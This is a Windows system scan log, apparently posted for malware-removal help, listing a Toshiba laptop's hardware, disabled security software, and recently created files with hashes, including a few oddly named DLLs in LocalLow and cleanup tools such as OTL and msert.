Display Adapters: Intel® HD Graphics Family | Intel® HD Graphics Family | NVIDIA GeForce GT 525M | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver

Monitors: 1x; Generic PnP Monitor |

Screen Resolution: 1366 X 768 - 32 bit

Network: Network Present

Network Adapters: Microsoft Virtual WiFi Miniport Adapter #2 | Microsoft Virtual WiFi Miniport Adapter | Realtek PCIe FE Family Controller | Intel® WiFi Link 1000 BGN

CD / DVD Drives: 1x (D: | ) D: MATSHITABD-MLT UJ260F

Ports: COM Ports NOT Present. LPT Port NOT Present.

Mouse: 5 Button Wheel Mouse Present

Hard Disks: C: 449.2GB

Hard Disks - Free: C: 294.7GB

Manufacturer *: TOSHIBA

BIOS Info: AT/AT COMPATIBLE | 10/30/12 | TOSCPL - 1072009

Time Zone: Central Standard Time

Motherboard *: TOSHIBA POQAA

Country: United States

Language: ENU

==== System Specs (Software) ======================

Anti-Virus: Norton 360 Premier Edition On-access scanning disabled (Outdated)

Anti-Spyware: Norton 360 Premier Edition disabled (Outdated)

Anti-Spyware: Windows Defender disabled (Outdated)

Firewall: Norton 360 Premier Edition disabled

Internet Explorer Version: 11.0.9600.17358

Google Chrome version: 38.0.2125.111

Adobe Reader version: 11.0.9.29

Sun Java version: 1.8.0_25 (32-bit)

Sun Java version: 1.8.0_25 (64-bit)

Flash Player version: 15.0.0.152

==== Files Recently Created / Modified ======================

====== C:\windows ====

2014-10-29 12:08:37 F042EE4C8D66248D9B86DCF52ABAE416 256000 ----a-w- C:\windows\PEV.exe

2014-10-29 12:08:37 5E832F4FAF5F481F2EAF3B3A48F603B8 68096 ----a-w- C:\windows\zip.exe

2014-10-29 12:08:37 0277C027A26428DB64EF4F64F52BB4FD 208896 ----a-w- C:\windows\MBR.exe

2014-10-29 12:08:36 9E05A9C264C8A908A8E79450FCBFF047 80412 ----a-w- C:\windows\grep.exe

2014-10-29 12:08:36 0297C72529807322B152F517FDB0A9FC 406528 ----a-w- C:\windows\SWSC.exe

====== C:\Users\ADH~1.HEA\AppData\Local\Temp ====

2014-10-30 00:52:58 D96111A5E60B604E022CF5AAD09D1522 509440 ----a-w- C:\Users\Heathman\AppData\Local\temp\sqlite-3.6.20-sqlitejdbc.dll

====== Java Cache =====

====== C:\windows\SysWOW64 =====


2014-10-19 21:51:28 2EFB1279E7BEA7D12D9F4D6508D27880 50176 ----a-w- C:\windows\SysWOW64\MsRdpWebAccess.dll

2014-10-19 21:51:27 5E676B296B762E211D83B87635F2C330 855552 ----a-w- C:\windows\SysWOW64\rdvidcrl.dll

2014-10-19 20:49:00 BBA80D3CAB22620A6AC9BB603386EE33 519680 ----a-w- C:\windows\SysWOW64\qdvd.dll

2014-10-19 20:48:57 A139A5E6B34F136405B030EA04595A20 156824 ----a-w- C:\windows\SysWOW64\mscorier.dll

2014-10-19 20:48:57 8580484193CE0A0788830FBAB97CF13B 1131664 ----a-w- C:\windows\SysWOW64\dfshim.dll

2014-10-19 20:48:56 D5D5BBF6AA45D820BAA0BD1303B8AAF6 81560 ----a-w- C:\windows\SysWOW64\mscories.dll

2014-10-19 20:48:53 06FC8A93A4FA1F42A3D1D06694F2B339 419992 ----a-w- C:\windows\SysWOW64\locale.nls

2014-10-19 20:48:50 C7673B3F8BB35221B42D67BF7ADAFDFD 7168 ----a-w- C:\windows\SysWOW64\KBDYAK.DLL

2014-10-19 20:48:50 730B7C639957EA0BF37C1459831A1E19 6656 ----a-w- C:\windows\SysWOW64\KBDRU1.DLL

2014-10-19 20:48:50 72222991598E173BBE1429426926C020 7168 ----a-w- C:\windows\SysWOW64\KBDTAT.DLL

2014-10-19 20:48:50 45B308F20FEF040BD7321E85F69DF5E2 6656 ----a-w- C:\windows\SysWOW64\KBDRU.DLL

2014-10-19 20:48:50 2BD0519015E899A2FF52210CC5875F88 6656 ----a-w- C:\windows\SysWOW64\KBDBASH.DLL

2014-10-19 20:48:40 3888D02CE6413C2A06D903DE1C778BF5 2363904 ----a-w- C:\windows\SysWOW64\msi.dll

2014-10-19 20:48:25 37C395C075E6FA66623C82DE50A8FAED 372736 ----a-w- C:\windows\SysWOW64\rastls.dll

2014-10-19 20:48:13 FD67683FBA9B2C4BB551780BD8846F64 157696 ----a-w- C:\windows\SysWOW64\winsta.dll

2014-10-19 20:48:13 DB1D6751689B4A7EE2439C64F2ADF1C9 17408 ----a-w- C:\windows\SysWOW64\credssp.dll

2014-10-19 20:48:13 13829161C1297F4170A5546430147BBD 65536 ----a-w- C:\windows\SysWOW64\TSpkg.dll

2014-10-19 20:45:57 C120855C1133DF8FFD5E0C04A7E70B67 67072 ----a-w- C:\windows\SysWOW64\packager.dll

====== C:\windows\SysWOW64\drivers =====

====== C:\windows\Sysnative =====

2014-10-30 11:42:05 2D01F001F8E45924E57B7BB77CF96BC2 28368 ----a-w- C:\windows\Sysnative\IEUDINIT.EXE

2014-10-30 11:40:25 344DA9D196C0D98A738289BB09CE4CF6 940032 ----a-w- C:\windows\Sysnative\MsSpellCheckingFacility.exe

2014-10-30 11:40:19 8F7FBD0177F79727CF945ABDA657A0AC 235008 ----a-w- C:\windows\Sysnative\elshyph.dll

2014-10-30 11:40:18 FD61D51199F3FC9EB0023FBF405EAAD0 147968 ----a-w- C:\windows\Sysnative\occache.dll

2014-10-30 11:40:18 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\windows\Sysnative\ieUnatt.exe

2014-10-30 11:40:18 F862CD08F1AD4EE39BD506853F3C6103 16284 ----a-w- C:\windows\Sysnative\ieuinit.inf

2014-10-30 11:40:18 F00AE7B953ABEF1B53FBBA187DFC8238 243200 ----a-w- C:\windows\Sysnative\webcheck.dll

2014-10-30 11:40:18 EB710A3AF29BEC4EE7475A1ED5C575DE 195584 ----a-w- C:\windows\Sysnative\msrating.dll

2014-10-30 11:40:18 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\windows\Sysnative\ieetwcollector.exe

2014-10-30 11:40:18 E70D4270C43CE6C46841B684315B9EFF 62464 ----a-w- C:\windows\Sysnative\pngfilt.dll

2014-10-30 11:40:18 E4A6577D74B2439974C8018AB5F1BFEA 13312 ----a-w- C:\windows\Sysnative\msfeedssync.exe

2014-10-30 11:40:18 DD8E9C85F9F428859713055183661956 48640 ----a-w- C:\windows\Sysnative\ieetwproxystub.dll

2014-10-30 11:40:18 DB101A62F9BF8E7765685950169EF52B 758272 ----a-w- C:\windows\Sysnative\jscript9diag.dll

2014-10-30 11:40:18 DAF317E9F4CEC206D0D443014A427341 446464 ----a-w- C:\windows\Sysnative\dxtmsft.dll

2014-10-30 11:40:18 D3B07C2FABEAE749E4E51F1E93CABA23 5829632 ----a-w- C:\windows\Sysnative\jscript9.dll

2014-10-30 11:40:18 D31AE751B6DACAFD0D7CC99EAE9606C2 131072 ----a-w- C:\windows\Sysnative\IEAdvpack.dll

2014-10-30 11:40:18 CE8831D2DCB5803A4CBC8EDCCBBC2A05 77312 ----a-w- C:\windows\Sysnative\tdc.ocx

2014-10-30 11:40:18 C92173481A58935BE15172079CF122B8 235520 ----a-w- C:\windows\Sysnative\url.dll

2014-10-30 11:40:18 C17139EAF939964142C7A1AEEE02DC81 616104 ----a-w- C:\windows\Sysnative\ieapfltr.dat

2014-10-30 11:40:18 C109D5136DF0A6CA668C7AD888AA125F 2724864 ----a-w- C:\windows\Sysnative\mshtml.tlb

2014-10-30 11:40:18 BE37AA454460539877420951EEA16EF0 51200 ----a-w- C:\windows\Sysnative\jsproxy.dll

2014-10-30 11:40:18 BB6DEAFAC5F0AAEC37FEAF3F3AA48347 774144 ----a-w- C:\windows\Sysnative\jscript.dll

2014-10-30 11:40:18 B07E9AFF50DC007E7D5AC54736AA5A25 4096 ----a-w- C:\windows\Sysnative\ieetwcollectorres.dll

2014-10-30 11:40:18 ADA5C3D49A12CED9F07913DC00E547A8 48128 ----a-w- C:\windows\Sysnative\imgutil.dll

2014-10-30 11:40:18 A2105E46DC9CE38A1D57FB124436E1BC 85504 ----a-w- C:\windows\Sysnative\mshtmled.dll

2014-10-30 11:40:18 9D98D4F390F0B14A782F3B931E613A1A 2309632 ----a-w- C:\windows\Sysnative\wininet.dll

2014-10-30 11:40:18 98241BE7EB26C41562D33393DD12608F 289280 ----a-w- C:\windows\Sysnative\dxtrans.dll

2014-10-30 11:40:18 9675B272086CF5D22B83B541FAA8D4EA 30208 ----a-w- C:\windows\Sysnative\licmgr10.dll

2014-10-30 11:40:18 95828D670CFD3B16EE188168E083C3C5 13824 ----a-w- C:\windows\Sysnative\mshta.exe

2014-10-30 11:40:18 88D2165E07CEDC3F34CBE1A5A807673D 595968 ----a-w- C:\windows\Sysnative\ieui.dll

2014-10-30 11:40:18 87D14AF9A2C3F3D5233B613CFA9C321D 378552 ----a-w- C:\windows\Sysnative\iedkcs32.dll

2014-10-30 11:40:18 7E60EE8A68F7270D1E1662CBA275D4FA 13619200 ----a-w- C:\windows\Sysnative\ieframe.dll

2014-10-30 11:40:18 7415B29AFE2E4494A57358B8C7E78600 23631360 ----a-w- C:\windows\Sysnative\mshtml.dll

2014-10-30 11:40:18 739D9C9F220CCEDAFD8212C6B976B60D 33792 ----a-w- C:\windows\Sysnative\iernonce.dll

2014-10-30 11:40:18 70527367E5779C3537992F0768D9C59A 1249280 ----a-w- C:\windows\Sysnative\mshtmlmedia.dll

2014-10-30 11:40:18 6F1AF8E1206E92256459E3012C20472A 942592 ----a-w- C:\windows\Sysnative\jsIntl.dll

2014-10-30 11:40:18 646C004F58AA4762F92BF7C595216C37 2108416 ----a-w- C:\windows\Sysnative\inetcpl.cpl

2014-10-30 11:40:18 5BBDBE5EBB49EA7C76A2EE7490A45D68 101376 ----a-w- C:\windows\Sysnative\inseng.dll

2014-10-30 11:40:18 5141B67F14E2B6CBB6ADF851ABE364A5 90112 ----a-w- C:\windows\Sysnative\SetIEInstalledDate.exe

2014-10-30 11:40:18 4D21F4FDF57DF86FAD9149ED1C071D15 72704 ----a-w- C:\windows\Sysnative\JavaScriptCollectionAgent.dll

2014-10-30 11:40:18 46FD16F9B1924A2EA8CD5C6716CC654F 167424 ----a-w- C:\windows\Sysnative\iexpress.exe

2014-10-30 11:40:18 45B736E3184B68515FDB71D4083A9BCF 731136 ----a-w- C:\windows\Sysnative\msfeeds.dll

2014-10-30 11:40:18 4399857346DD183683332921500046B1 86016 ----a-w- C:\windows\Sysnative\RegisterIEPKEYs.exe

2014-10-30 11:40:18 3A4FD19F13F8809BA08E9F76C0E38832 413696 ----a-w- C:\windows\Sysnative\html.iec

2014-10-30 11:40:18 328143D6BC5951E1797BD524C4E98CDC 547328 ----a-w- C:\windows\Sysnative\vbscript.dll

2014-10-30 11:40:18 30FB9ABB6C45C3299CFA5F556904DD5F 83968 ----a-w- C:\windows\Sysnative\MshtmlDac.dll

2014-10-30 11:40:18 2EBD0C5B090125AECF017C57344C45AB 247808 ----a-w- C:\windows\Sysnative\msls31.dll

2014-10-30 11:40:18 2E5AF1507CBE735B4D7EBFF1908EA0E1 775168 ----a-w- C:\windows\Sysnative\ieapfltr.dll

2014-10-30 11:40:18 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\windows\Sysnative\ie4uinit.exe

2014-10-30 11:40:18 2405D24AA28CCC4CC7E0CC0AE008746F 48640 ----a-w- C:\windows\Sysnative\mshtmler.dll

2014-10-30 11:40:18 1FCBE949A67939ADEAE7279E423AA684 135680 ----a-w- C:\windows\Sysnative\iepeers.dll

2014-10-30 11:40:18 1EA6500C25A80E8BDB65099C509AF993 143872 ----a-w- C:\windows\Sysnative\wextract.exe

2014-10-30 11:40:18 0FBEBD36FEFFEE5AF25FDAEE5E35EE99 105984 ----a-w- C:\windows\Sysnative\iesysprep.dll

2014-10-30 11:40:18 0F5A279522FA6A30C9C5A297A1064933 1447936 ----a-w- C:\windows\Sysnative\urlmon.dll

2014-10-30 11:40:18 0A9D5716CB1F3AFA73703F39647BB8C2 81408 ----a-w- C:\windows\Sysnative\icardie.dll

2014-10-30 11:40:18 050FD78BA4EFA62417F61F4C098B5B25 2796032 ----a-w- C:\windows\Sysnative\iertutil.dll

2014-10-30 11:40:18 0467A4DDA6B2CE8E27A8178BF035BA18 66048 ----a-w- C:\windows\Sysnative\iesetup.dll

2014-10-30 11:40:18 038ABC9BCC86DFF9E181D44E43E2CEBA 52224 ----a-w- C:\windows\Sysnative\msfeedsbs.dll

2014-10-20 17:22:00 6DD73E4E947DB3B0608321AE13210D94 6584320 ----a-w- C:\windows\Sysnative\mstscax.dll

2014-10-19 21:51:30 DDED7C5558B3AE09F568945281A9A6D1 44544 ----a-w- C:\windows\Sysnative\TsUsbGDCoInstaller.dll

2014-10-19 21:51:28 FEC6178962DFF33074D39CA907971405 12800 ----a-w- C:\windows\Sysnative\TsUsbRedirectionGroupPolicyExtension.dll

2014-10-19 21:51:28 8E75B1112C374EBDF18FD640DA2F0655 1147392 ----a-w- C:\windows\Sysnative\mstsc.exe

2014-10-19 21:51:28 7BD2E6E2458A5B95F8341244C7FC7DD4 18944 ----a-w- C:\windows\Sysnative\wksprtPS.dll

2014-10-19 21:51:28 79EE5ECB4BE89343E4CF1E48F7769F59 420864 ----a-w- C:\windows\Sysnative\wksprt.exe

2014-10-19 21:51:28 5289A00E2D21BB3A7D6761646543ED5C 62976 ----a-w- C:\windows\Sysnative\tsgqec.dll

2014-10-19 21:51:28 149A388C17F04AD1F99B477A43BE1A9F 56832 ----a-w- C:\windows\Sysnative\MsRdpWebAccess.dll

2014-10-19 21:51:28 108C257D765AAD2E6EC46557DA0B02BD 13824 ----a-w- C:\windows\Sysnative\TsUsbRedirectionGroupPolicyControl.exe

2014-10-19 21:51:28 0D2C2FAC4F29B5868D39B7267058CFEF 83968 ----a-w- C:\windows\Sysnative\TSWbPrxy.exe

2014-10-19 21:51:27 A4420969E5AB94856E5C0C02E6099D3F 1057280 ----a-w- C:\windows\Sysnative\rdvidcrl.dll

2014-10-19 20:49:00 8D46C7BCDF7FBAAC8666D6640ADA930E 371712 ----a-w- C:\windows\Sysnative\qdvd.dll

2014-10-19 20:48:59 5602D4C331FD7938ADE06D9242138922 3198976 ----a-w- C:\windows\Sysnative\win32k.sys

2014-10-19 20:48:57 2D6C77A3DB3D8EE00FB55834A67E4073 156312 ----a-w- C:\windows\Sysnative\mscorier.dll

2014-10-19 20:48:56 50EC828370CB5F5E9FF08B10F1B701C8 73880 ----a-w- C:\windows\Sysnative\mscories.dll

2014-10-19 20:48:56 5083CC5456FE8A5D21ECF9E32ACC779F 1943696 ----a-w- C:\windows\Sysnative\dfshim.dll

2014-10-19 20:48:53 06FC8A93A4FA1F42A3D1D06694F2B339 419992 ----a-w- C:\windows\Sysnative\locale.nls

2014-10-19 20:48:50 BE67D99EDA34A68B827868371B5529AD 7168 ----a-w- C:\windows\Sysnative\KBDTAT.DLL

2014-10-19 20:48:50 80EDA24B00478FA795F90DFA09C12E86 7168 ----a-w- C:\windows\Sysnative\KBDRU1.DLL

2014-10-19 20:48:50 353C4A38042819CA83AEFC6F2E7051CD 6656 ----a-w- C:\windows\Sysnative\KBDRU.DLL

2014-10-19 20:48:49 EA21295A386C6DB2A2A90E657B37C5F4 7168 ----a-w- C:\windows\Sysnative\KBDYAK.DLL

2014-10-19 20:48:49 920B5C1CC0BAB6E574297BC3D945DA31 7168 ----a-w- C:\windows\Sysnative\KBDBASH.DLL

2014-10-19 20:48:47 974F83636F841739FEA5CC6219BFB241 276480 ----a-w- C:\windows\Sysnative\generaltel.dll

2014-10-19 20:48:47 510D5492BCA9E63E10E3CE0285965722 507392 ----a-w- C:\windows\Sysnative\aepdu.dll

2014-10-19 20:48:46 767D478BB4B2F84B47B3C0956E6A5A05 424448 ----a-w- C:\windows\Sysnative\aeinv.dll

2014-10-19 20:48:40 ADD3F2C3E6B89BD16D4BFC61B3658DD9 3241472 ----a-w- C:\windows\Sysnative\msi.dll

2014-10-19 20:48:29 E9CB5F138943D383DB67F29AAB60453F 3179520 ----a-w- C:\windows\Sysnative\rdpcorets.dll

2014-10-19 20:48:25 DD7C31F12936795C0516BB6C59CBCCD8 424448 ----a-w- C:\windows\Sysnative\rastls.dll

2014-10-19 20:48:13 C23B6D9D16FD86F446BE607CA18389D9 235520 ----a-w- C:\windows\Sysnative\winsta.dll

2014-10-19 20:48:13 85E03B6E05939845BC924C91AEDE0E24 86528 ----a-w- C:\windows\Sysnative\TSpkg.dll

2014-10-19 20:48:13 560CF90C026C0FE51CC6820302FF94FE 22016 ----a-w- C:\windows\Sysnative\credssp.dll

2014-10-19 20:48:13 4FC4C50985E5B840F4D72E57286887B8 681984 ----a-w- C:\windows\Sysnative\termsrv.dll

2014-10-19 20:48:13 0374D83D003043E7DE33036294A2EFAE 150528 ----a-w- C:\windows\Sysnative\rdpcorekmts.dll

2014-10-19 20:45:57 1DB68B8A1E3BDE3C19F1D3612CE436CA 77312 ----a-w- C:\windows\Sysnative\packager.dll

====== C:\windows\Sysnative\drivers =====

2014-10-19 21:51:28 E9981ECE8D894CEF7038FD1D040EB426 56832 ----a-w- C:\windows\Sysnative\drivers\TsUsbFlt.sys

2014-10-19 21:00:47 E16E2431516D904CED3946AD3FF8C86B 854 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.INF

2014-10-19 21:00:47 97E11C50CE52277B377396EA8838E539 177752 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.SYS

2014-10-19 21:00:47 7846ED59291A134CC5DD017C6EC7B433 8222 ----a-w- C:\windows\Sysnative\drivers\SYMEVENT64x86.CAT

2014-10-19 20:48:13 FE571E088C2D83619D2D48D4E961BF41 212480 ----a-w- C:\windows\Sysnative\drivers\rdpwd.sys

2014-10-19 20:48:13 E232A3B43A894BB327FC161529BD9ED1 39936 ----a-w- C:\windows\Sysnative\drivers\tssecsrv.sys

====== C:\windows\Tasks ======

====== C:\windows\Temp ======

======= C:\Program Files =====

======= C:\PROGRA~2 =====

2014-10-30 11:58:02 -------- d-----w- C:\PROGRA~2\COMMON~1\Java

2014-10-29 22:50:04 -------- d-----w- C:\PROGRA~2\ESET

======= C: =====

====== C:\Users\ADH.Heathman-PC\AppData\Roaming ======

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH~1.HEA\AppData\Local\EmieUserList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH~1.HEA\AppData\Local\EmieSiteList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH.Heathman-PC\AppData\Local\EmieUserList

2014-10-30 11:45:41 -------- d-sh--w- C:\Users\ADH.Heathman-PC\AppData\Local\EmieSiteList

2014-10-29 12:43:43 -------- d-----w- C:\Users\UpdatusUser\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\UpdatusUser.Heathman-PC\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Public\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Heathman\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Guest\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Default\AppData\Local\temp

2014-10-29 12:43:43 -------- d-----w- C:\Users\Default User\AppData\Local\temp

2014-10-26 14:59:41 B3492776EA0F205D29748B0DA1AC1F0F 29184 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\grbfa.dll

2014-10-26 14:59:41 B3492776EA0F205D29748B0DA1AC1F0F 29184 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\grbfa.dll

2014-10-26 00:52:28 D41D8CD98F00B204E9800998ECF8427E 0 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\seetla.dll

2014-10-26 00:52:28 D41D8CD98F00B204E9800998ECF8427E 0 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\seetla.dll

2014-10-26 00:52:27 25255DFC277D9234CED2DD203E85A4A2 29184 ----a-w- C:\Users\ADH~1.HEA\AppData\Locallow\srayb.dll

2014-10-26 00:52:27 25255DFC277D9234CED2DD203E85A4A2 29184 ----a-w- C:\Users\ADH.Heathman-PC\AppData\Locallow\srayb.dll

2014-10-24 16:33:34 -------- d-----w- C:\Users\ADH~1.HEA\AppData\Locallow\{D2E3A4D8-4D43-490B-8F4B-24D5491A9ED1}

2014-10-24 16:33:34 -------- d-----w- C:\Users\ADH.Heathman-PC\AppData\Locallow\{D2E3A4D8-4D43-490B-8F4B-24D5491A9ED1}

2014-10-21 15:22:45 -------- d-----w- C:\Users\ADH~1.HEA\AppData\Local\Diagnostics

2014-10-21 15:22:45 -------- d-----w- C:\Users\ADH.Heathman-PC\AppData\Local\Diagnostics

====== C:\Users\ADH.Heathman-PC ======

2014-10-30 11:57:42 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

2014-10-30 11:57:33 -------- d-----w- C:\ProgramData\Oracle

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH~1.HEA\Downloads\esetsmartinstaller_enu.exe

2014-10-29 22:49:53 E8D3E34FFDAF21DF7C09CBBBA5763237 2347384 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\esetsmartinstaller_enu.exe

2014-10-29 17:59:31 -------- d-----w- C:\Users\Public\TOSHIBA

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH~1.HEA\Desktop\OTL.exe

2014-10-29 13:07:36 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 12:43:43 -------- d-----w- C:\Users\Public\AppData

2014-10-29 03:33:56 5DCED6B6A9BF0C12079E8F9513B3C8C1 4974864 ----a-w- C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH~1.HEA\Downloads\msert.exe

2014-10-27 22:51:39 731BB89065411453860C48EEE348961E 120407800 ----a-w- C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-24 23:49:53 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-17 17:57:46 29F7E0A2249E73F3E02C38687A867671 127289600 ----a-w- C:\Users\Heathman\Downloads\msert (1).exe

====== C: exe-files ==

2014-10-30 11:57:43 AA3520FB0133A56BEE1DB34D74DBEF64 0 ----a-we C:\ProgramData\Oracle\Java\javapath\java.exe

2014-10-30 11:57:43 75D477E868CA51EC1B09D730570F322B 0 ----a-we C:\ProgramData\Oracle\Java\javapath\javaw.exe

2014-10-30 11:57:43 691D49FB44EDE9788288CABE4F7E0DAF 0 ----a-we C:\ProgramData\Oracle\Java\javapath\javaws.exe

2014-10-30 11:57:39 E3E6B18458FFB07CB24D7A0BA77C9FDF 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\pack200.exe

2014-10-30 11:57:39 DC197DCE6325CBAC905DE0D0E3BA3E8E 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\rmid.exe

2014-10-30 11:57:39 B719E0F43166037DF46B5CFBE60A5118 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jjs.exe

2014-10-30 11:57:39 A458E2535E46151690E53E2A03FAA711 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\keytool.exe

2014-10-30 11:57:39 9BFAEF308D50779F6B255CB7BA7DCA5A 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\kinit.exe

2014-10-30 11:57:39 7AB1F1B3FB6C3DACA34EA2F988CDF5AC 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\orbd.exe

2014-10-30 11:57:39 75EE99C7F0038C746D82C76221ECA4EF 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\policytool.exe

2014-10-30 11:57:39 75D477E868CA51EC1B09D730570F322B 176552 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javaw.exe

2014-10-30 11:57:39 691D49FB44EDE9788288CABE4F7E0DAF 272296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javaws.exe

2014-10-30 11:57:39 67F763B09F4BC8689E6FA9761E068D74 159656 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\unpack200.exe

2014-10-30 11:57:39 57E1F756FAA787623DFCD2C1B2AACC68 51112 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssvagent.exe

2014-10-30 11:57:39 4367C05B0CF5553E71B34F51003D0615 76200 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2launcher.exe

2014-10-30 11:57:39 4109C4DB4BD48F5BF8115C7523A6B6F8 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\klist.exe

2014-10-30 11:57:39 33D2AF53E209DA3E2BA939EB89801DC0 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\rmiregistry.exe

2014-10-30 11:57:39 29E65AC6AFD8A0A9CAA361FF6F7B4886 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\servertool.exe

2014-10-30 11:57:39 28FC00F89631B0F6E1E9CA386FADD566 16296 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\tnameserv.exe

2014-10-30 11:57:39 26C7F32186B1F0364CD06EA69227A79D 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\ktab.exe

2014-10-30 11:57:38 BB8C890E3E6372F2720709262BD42BF4 30632 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\jabswitch.exe

2014-10-30 11:57:38 AA3520FB0133A56BEE1DB34D74DBEF64 176552 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\java.exe

2014-10-30 11:57:38 74713E9C1B01B152DDD3A1A3519A3647 15784 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\java-rmi.exe

2014-10-30 11:57:38 70E67429D2C011FD0419AF899A8D0D70 68520 ----a-w- C:\Program Files (x86)\Java\jre1.8.0_25\bin\javacpl.exe

2014-10-30 11:42:05 2D01F001F8E45924E57B7BB77CF96BC2 28368 ----a-w- C:\Windows\System32\IEUDINIT.EXE

2014-10-30 11:40:25 344DA9D196C0D98A738289BB09CE4CF6 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe

2014-10-30 11:40:19 F9F310F9FB7F294F00ABDD03453D8CEE 812736 ----a-w- C:\Program Files (x86)\Internet Explorer\iexplore.exe

2014-10-30 11:40:19 C1A6E565B2782C09BC40AD749B46D9ED 71680 ----a-w- C:\Windows\SysWOW64\RegisterIEPKEYs.exe

2014-10-30 11:40:19 ABDFC692D9FE43E2BA8FE6CB5A8CB95A 13312 ----a-w- C:\Windows\SysWOW64\mshta.exe

2014-10-30 11:40:19 AA103FEAD721863B86A1B1260948E662 112128 ----a-w- C:\Windows\SysWOW64\ieUnatt.exe

2014-10-30 11:40:19 9A33FDDD687A836A1FD478B43C5A95FD 151552 ----a-w- C:\Windows\SysWOW64\iexpress.exe

2014-10-30 11:40:19 887055A3C8DD6C87D200D11EAFDBD45B 74240 ----a-w- C:\Windows\SysWOW64\SetIEInstalledDate.exe

2014-10-30 11:40:19 7F7F391491C315A4A72EFCAC0D34FA93 25600 ----a-w- C:\Program Files (x86)\Internet Explorer\ExtExport.exe

2014-10-30 11:40:19 6A92CEC8532056791C6832B2725D170D 139264 ----a-w- C:\Windows\SysWOW64\wextract.exe

2014-10-30 11:40:19 54C9747BB0A64F4D9D401E4648363386 222720 ----a-w- C:\Program Files (x86)\Internet Explorer\ielowutil.exe

2014-10-30 11:40:19 53FC62C51CB18C9100A7DFAF2D2A6C47 12800 ----a-w- C:\Windows\SysWOW64\msfeedssync.exe

2014-10-30 11:40:19 53E24F2DB97EFAF85FE093AA254790EC 470528 ----a-w- C:\Program Files (x86)\Internet Explorer\ieinstal.exe

2014-10-30 11:40:18 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\Windows\System32\ieUnatt.exe

2014-10-30 11:40:18 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe

2014-10-30 11:40:18 E4A6577D74B2439974C8018AB5F1BFEA 13312 ----a-w- C:\Windows\System32\msfeedssync.exe

2014-10-30 11:40:18 C876F8303AA30481A36FE2AACDE77671 483840 ----a-w- C:\Program Files\Internet Explorer\ieinstal.exe

2014-10-30 11:40:18 95828D670CFD3B16EE188168E083C3C5 13824 ----a-w- C:\Windows\System32\mshta.exe

2014-10-30 11:40:18 6B9FDB34A5A490FF6A7EDE280062626A 810680 ----a-w- C:\Program Files\Internet Explorer\iexplore.exe

2014-10-30 11:40:18 649E8F572EC0D929F4EED13A53AC0475 222720 ----a-w- C:\Program Files\Internet Explorer\ielowutil.exe

2014-10-30 11:40:18 5141B67F14E2B6CBB6ADF851ABE364A5 90112 ----a-w- C:\Windows\System32\SetIEInstalledDate.exe

2014-10-30 11:40:18 46FD16F9B1924A2EA8CD5C6716CC654F 167424 ----a-w- C:\Windows\System32\iexpress.exe

2014-10-30 11:40:18 4399857346DD183683332921500046B1 86016 ----a-w- C:\Windows\System32\RegisterIEPKEYs.exe

2014-10-30 11:40:18 41F922D6A794C0F8425C8436D7077C84 359632 ----a-w- C:\Program Files\Internet Explorer\iediagcmd.exe

2014-10-30 11:40:18 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\Windows\System32\ie4uinit.exe

2014-10-30 11:40:18 1EA6500C25A80E8BDB65099C509AF993 143872 ----a-w- C:\Windows\System32\wextract.exe

